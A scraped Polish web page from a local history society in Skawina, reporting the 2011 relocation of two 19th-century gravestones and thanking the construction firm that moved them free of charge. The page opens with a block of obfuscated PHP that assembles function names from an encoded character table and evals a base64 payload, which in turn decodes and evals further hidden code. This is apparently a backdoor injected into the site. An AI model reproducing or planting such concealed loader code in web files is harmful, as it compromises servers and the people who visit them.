$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iRG9oSHpPY2luc0xDZ1V5R1JQbUt1UWVxRmpKWmF3QkFmVlRJZFdrYnhsdnByU3RZWE1ORWFQa215aXFkV1NjTkZCTW5sVll2dWJlQ1JLSnpwRVpPZ3JIakl3aGZvVVhER0xBc3h0UVRWYTlFcG1PRmFiUD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> PRACE WYKONANE W 2011 R. cz. 1 | Towarzystwo Przyjaciół Skawiny

Towarzystwo Przyjaciół Skawiny

PRACE WYKONANE W 2011 R. cz. 1

data dodania: 28 grudnia 2012

W dniach 3 i 6 czerwca br. zostały przemieszczone z cmentarza Parafialnego na cmentarz Komunalny w Skawinie dwa zabytkowe XIX wieczne nagrobki dziedziców Korabnik:

– Maxymiliana Dzięgielowskiego + 1886.

– Zofii Brudzewskiej + 1890, która gościła w Korabnikach Stanisława Wyspiańskiego i     bohemę krakowską.

Niezwiązane już z miejscem pochówku nagrobki, stały pod murem Kaplicy starego cmentarza od czasów Proboszcza ks. Leona Barana; nie tylko gwałtownie niszczejąc lecz również przeszkadzając w planowanym remoncie Kaplicy. Po naszych konsultacjach z Proboszczem ks. Edwardem Ćmielem i uzgodnieniach z tutejszym Urzędem Miasta, zapadły decyzje o konieczności renowacji nagrobków oraz ich nowej lokalizacji; sprawą kluczową pozostało przetransportowanie. Dwumetrowej wysokości piaskowcowe bryły o wadze paruset kilogramów każda, zostały między czasie otoczone nowymi nagrobkami powstałymi wokół Kaplicy, uniemożliwiającymi – podobnie jak wąskie cmentarne alejki – korzystanie ze sprzętu ciężkiego. Tak więc czynności podziału brył oraz transportowe w obrębie cmentarza Parafialnego musiały być dokonane siłą mięśni ludzkich!

Mając taką świadomość Towarzystwo Przyjaciół Skawiny zwróciło sie o pomoc do Pana Prezesa Macieja Cichego, szefa prężnego Przedsiębiorstwa Budowlano-Usługowego GOMIBUD z Borku Szlacheckiego.

Prośba została przyjęta ze zrozumieniem i po dwu tygodniach zrealizowana!! Pracownicy firmy GOMIBUD: Bułat Marek, Kubas Robert, Kucharczyk Włodzimierz, Zaporowski Robert, Zaremba Aleksander i Wojtas Zbigniew, pod fachowym nadzorem kierownika Ireneusza Habera, wspomagani dużym samochodem z dźwigiem budowlanym, powierzone zadanie wykonali na medal.

\W pierwszym dniu na cmentarzu Komunalnym wykonano postument pod nagrobki w ten sposób, że zniwelowane podłoże wypełniono kruszywem na, którym ułożono kostkę brukową aby zapewnić stabilność dla położenia betonowej płyty o wymiarach 4*1m, wykonanej specjalnie przez GOMIBUD w tym celu. W drugim dniu; 6 czerwca 2011r. dokonano demontażu nagrobków, przewiezienia ich pod Kaplice Pogrzebową cmentarza Komunalnego i ponownie zestawiono – przed drewnianym Krzyżem misyjnym 2007 – tworząc tym samym interesującą kompozycję „trzech krzyży”.

Wymienione roboty pracownicy GOMIBUDU wykonali kompleksowo, sprawnie i profesjonalnie – choć przecież ich profil pracy jest inny (vide piękny, solidny most na Rzepniku przy ul. Łanowej w Skawinie/ Dokonali przemieszczenia wspomnianych nagrobków bez zbędnych formalności /zlecenia, obmiarów itp.), gratis, całkowicie społecznie; korzystając jedynie z pomocy koordynacyjnej  naszego kol. Jana Liskiewicza.

Taka postawa Pana Prezesa Macieja Cichego i pracowników GOMIBUDU winna być wzorem dla wielu osób prywatnych, firm i urzędów działających w dzisiejszej, skomercjalizowanej rzeczywistości na zupełnie odmiennych zasadach. Wzorem tym bardziej podkreślonym, że Towarzystwo Przyjaciół Skawiny już po raz drugi korzysta z pomocy tego sponsora, co pierwotnie miało miejsce przy odbudowie Krzyża przy ul. Granicznej, z inicjatywy naszej kol. Elżbiety Panek.

Panie Prezesie, raz jeszcze z serca dziękujemy!

Zdjęcia przybliżające tą skomplikowaną operację znajdą Państwo w poniższej galerii.